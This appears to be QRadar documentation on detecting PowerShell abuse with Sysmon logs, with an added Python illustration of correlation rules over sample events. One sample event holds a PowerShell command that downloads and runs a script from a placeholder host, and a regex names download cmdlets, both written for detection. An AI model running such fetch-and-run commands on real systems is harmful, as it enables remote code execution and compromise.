Sysmon: PowerShell

Sysmon is a Microsoft Windows system service and device driver that monitors system activity and logs events in the Windows event log. You can forward the Windows event logs to QRadar and analyze them to detect advanced threats on the Windows endpoints.

The Sysmon use case shows how QRadar detects suspicious behavior after a user downloads a file attachment and runs it on a Windows workstation.

When the user opens the downloaded file, it starts a command shell that runs a PowerShell script, which downloads and runs a file from an external location and compromises the user's computer. The attacker then escalates their privileges to system-level access permissions and downloads the usernames and passwords for the network. By logging in to peer computers, the attacker moves laterally and runs PowerShell scripts to start processes on multiple computers across the network.

For more QRadar content that supports the Sysmon: PowerShell use case, download the IBM QRadar Content Extension for Sysmon. The content pack includes rules, building blocks, reference sets, and custom functions that can be used to detect advanced threats, such as PowerShell abuse, hidden Windows processes, and file-less memory attacks.

Simulating the threat

To see how QRadar detects the attack, watch the Sysmon: PowerShell simulation video.

To run the simulation in QRadar, follow these steps:
  1. On the Log Activity tab, click Show Experience Center.
  2. Click Threat simulator.
  3. Locate the Sysmon: PowerShell simulation and click Run.
On the Log Activity tab, you can see the following incoming events that are used to simulate the use case:
Table 1. Incoming events for the Sysmon: PowerShell use case

Content       Description
Events        Process Create
              A service was installed in a system
Log sources   Experience Center: WindowsAuthServer @ EC: <machine_name>
              Experience Center: WindowsAuthServer @ EC: <user_name>

The events play in a loop and the same use case repeats multiple times. To stop the simulation, click Stop on the Threat simulator tab.

Detecting the threat: QRadar in action

The Custom Rules Engine (CRE) component of QRadar is responsible for processing incoming events and flows. The CRE compares the events and flows against a collection of tests, which are known as rules, and the rules create offenses when specific conditions are met. The CRE tracks the rule tests and incident counts over time.

But knowing that an offense occurred is only the first step. QRadar makes it easier for you to do a deeper dive and identify how it happened, where it happened, and who did it. By indexing the offense, all events with the same threat name appear as a single offense.
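As an added illustration of the kind of rule logic described above (this is not QRadar's CRE, its rule syntax, or the Sysmon content extension's own rules), the following Python correlation runs over constructed Sysmon-style events, assigns a threat name to each event that matches a rule, and groups matching hosts into one offense per threat name, adding a chained offense for the escalate-then-move-laterally sequence from the use case. The event field layout, host names, the download-cmdlet regex, and the choice of wsmprovhost.exe as the parent for PowerShell remoting and of a service install as the escalation signal are assumptions made for the example.

```python
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SVC = "A service was installed in a system"
# Constructed sample events (not real log data), as tuples of
# (host, event, parent image, image, command line), mimicking the two Sysmon
# event types the simulation replays. WS01: cmd.exe starts a PowerShell
# download, then a service is installed; WS02/WS03: PowerShell started by the
# WinRM host process; WS04: benign interactive use from Explorer.
SAMPLE_EVENTS = [
    ("WS01", "Process Create", r"C:\Windows\System32\cmd.exe", PS,
     'powershell.exe -Command "Invoke-WebRequest http://example.invalid/x.ps1 -OutFile x.ps1; .\\x.ps1"'),
    ("WS01", SVC, "", r"C:\Users\alice\AppData\Local\Temp\svc.exe", ""),
    ("WS02", "Process Create", r"C:\Windows\System32\wsmprovhost.exe", PS, "powershell.exe -NoProfile -Command Get-Process"),
    ("WS03", "Process Create", r"C:\Windows\System32\wsmprovhost.exe", PS, "powershell.exe -NoProfile -Command Get-Process"),
    ("WS04", "Process Create", r"C:\Windows\explorer.exe", PS, "powershell.exe Get-Date"),
]

# Download cmdlets and .NET methods; a production rule would keep these in a reference set.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer", re.I)

def classify(host, event, parent, image, cmdline):
    """Return the threat name this event matches, or None if no rule fires."""
    if event == SVC:
        return "Suspicious service install"
    if event != "Process Create" or not image.lower().endswith("powershell.exe"):
        return None
    if parent.lower().endswith("cmd.exe") and DOWNLOAD_RE.search(cmdline):
        return "Shell spawned PowerShell downloader"
    if parent.lower().endswith("wsmprovhost.exe"):  # WinRM host: PowerShell remoting
        return "Remote PowerShell execution"
    return None

def build_offenses(events, min_lateral_hosts=2):
    """Group matching events by threat name (one offense per name), then add a
    chained offense when a host that ran the downloader also saw a service
    install and remote PowerShell ran on at least min_lateral_hosts other hosts."""
    hosts_by_threat = defaultdict(set)
    for ev in events:
        name = classify(*ev)
        if name:
            hosts_by_threat[name].add(ev[0])
    escalated = (hosts_by_threat.get("Shell spawned PowerShell downloader", set())
                 & hosts_by_threat.get("Suspicious service install", set()))
    remote = hosts_by_threat.get("Remote PowerShell execution", set()) - escalated
    if escalated and len(remote) >= min_lateral_hosts:
        hosts_by_threat["PowerShell lateral movement after escalation"] = escalated | remote
    return {name: sorted(hosts) for name, hosts in hosts_by_threat.items()}
```

Running build_offenses(SAMPLE_EVENTS) yields one entry per threat name, with the chained offense listing WS01, WS02 and WS03 and the benign WS04 event matching nothing.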

Investigating the threat

To see the list of QRadar content that contributes to this simulation, including rules, saved searches, offenses, and reference sets, follow these steps:
  1. Open the IBM QRadar Experience Center app.
  2. In the Threat simulator window, click the Read More link for the simulation, and select the type of content that you want to review.

    Alternatively, from the Log Activity tab, you can run the quick search called EC: Sysmon events to view all events that are associated with the offense.